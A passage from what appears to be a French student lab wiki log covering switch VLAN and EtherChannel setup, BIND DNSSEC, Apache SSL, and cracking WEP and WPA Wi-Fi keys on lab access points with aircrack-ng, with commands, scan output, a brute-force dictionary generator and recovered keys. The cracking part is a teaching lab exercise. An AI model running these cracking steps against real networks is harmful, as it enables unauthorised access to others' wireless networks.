Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[FILE=ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Ssl.png&amp;diff=35768</id>
		<title>Fichier:Ssl.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Ssl.png&amp;diff=35768"/>
				<updated>2016-12-08T13:57:06Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35761</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35761"/>
				<updated>2016-12-08T10:05:05Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation du site via certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
